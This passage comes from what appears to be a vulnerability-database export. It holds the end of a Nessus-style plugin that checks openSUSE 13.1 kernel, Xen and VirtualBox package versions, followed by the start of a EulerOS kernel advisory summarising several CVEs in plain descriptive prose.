reference:\"iscsitarget-kmp-xen-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-vanilla-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-syms-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libipset3-debuginfo-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-1.58-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debuginfo-1.58-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-debugsource-1.58-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-default-debuginfo-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-desktop-debuginfo-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ndiswrapper-kmp-pae-debuginfo-1.58_k3.11.10_25-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-0.44-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debuginfo-0.44-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-debugsource-0.44-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-default-debuginfo-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-desktop-debuginfo-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"pcfclock-kmp-pae-debuginfo-0.44_k3.11.10_25-258.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-virtualbox-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-debugsource-20130607-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-default-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-desktop-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-pae-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"vhba-kmp-xen-debuginfo-20130607_k3.11.10_25-2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-debugsource-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-devel-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-kmp-pae-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-tools-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-guest-x11-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-host-kmp-pae-debuginfo-4.2.18_k3.11.10_25-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-qt-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"virtualbox-websrv-debuginfo-4.2.18-2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-debugsource-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-devel-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-default-debuginfo-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-desktop-debuginfo-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-kmp-pae-debuginfo-4.3.2_02_k3.11.10_25-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-libs-debuginfo-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xen-tools-domU-debuginfo-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-2.3-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debuginfo-2.3-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-debugsource-2.3-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-default-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-desktop-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-pae-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"xtables-addons-kmp-xen-debuginfo-2.3_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.11.10-25.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-4.3.2_02-30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"xen-xend-tools-debuginfo-4.3.2_02-30.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cloop / cloop-debuginfo / cloop-debugsource / cloop-kmp-default / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T09:01:30", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):** DISPUTED ** Multiple\n integer overflows in the lzo1x_decompress_safe function\n in lib/lzo/lzo1x_decompress_safe.c in the LZO\n decompressor in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)A\n certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)An elevation of\n privilege vulnerability in the kernel scsi driver.\n Product: Android. Versions: Android kernel. Android ID\n A-65023233.(CVE-2017-13168)An issue was discovered in\n drivers/i2c/i2c-core-smbus.c in the Linux kernel before\n 4.14.15. There is an out of bounds write in the\n function i2c_smbus_xfer_emulated.(CVE-2017-18551)An\n issue was discovered in net/ipv6/ip6mr.c in the Linux\n kernel before 4.11. By setting a specific socket\n option, an attacker can control a pointer in kernel\n land and cause an inet_csk_listen_stop general\n protection fault, or potentially execute arbitrary code\n under certain circumstances. The issue can be triggered\n as root (e.g., inside a default LXC container or with\n the CAP_NET_ADMIN capability) or after namespace\n unsharing. This occurs because sk_type and protocol are\n not checked in the appropriate part of the ip6_mroute_*\n functions. NOTE: this affects Linux distributions that\n use 4.9.x longterm kernels before\n 4.9.187.(CVE-2017-18509)An issue was discovered in the\n Linux kernel before 4.14.11. A double free may be\n caused by the function allocate_trace_buffer in the\n file kernel/trace/trace.c.(CVE-2017-18595)An issue was\n discovered in the Linux kernel through 4.17.10. There\n is a NULL pointer dereference and panic in\n hfsplus_lookup() in fs/hfsplus/dir.c when opening a\n file (that is purportedly a hard link) in an hfs+\n filesystem that has malformed catalog data, and is\n mounted read-only without a metadata\n directory.(CVE-2018-14617)An issue was discovered in\n write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in\n the Linux kernel through 5.3.2. The cxgb4 driver is\n directly calling dma_map_single (a DMA function) from a\n stack variable. This could allow an attacker to trigger\n a Denial of Service, exploitable if this driver is used\n on an architecture for which this stack/DMA interaction\n has security relevance.(CVE-2019-17075)Double free\n vulnerability in the snd_usbmidi_create function in\n sound/usb/midi.c in the Linux kernel before 4.5 allows\n physically proximate attackers to cause a denial of\n service (panic) or possibly have unspecified other\n impact via vectors involving an invalid USB\n descriptor.(CVE-2016-2384)fsamespace.c in the Linux\n kernel through 3.16.1 does not properly restrict\n clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and\n changing MNT_ATIME_MASK during a remount of a bind\n mount, which allows local users to gain privileges,\n interfere with backups and auditing on systems that had\n atime enabled, or cause a denial of service (excessive\n filesystem updating) on systems that had atime disabled\n via a 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)fs/overlayfs/dir.c in the\n OverlayFS filesystem implementation in the Linux kernel\n before 4.6 does not properly verify the upper dentry\n before proceeding with unlink and rename system-call\n processing, which allows local users to cause a denial\n of service (system crash) via a rename system call that\n specifies a self-hardlink.(CVE-2016-6197)In the Linux\n kernel before 4.1.4, a buffer overflow occurs when\n checking userspace params in\n drivers/media/dvb-frontends/cx24116.c. The maximum size\n for a 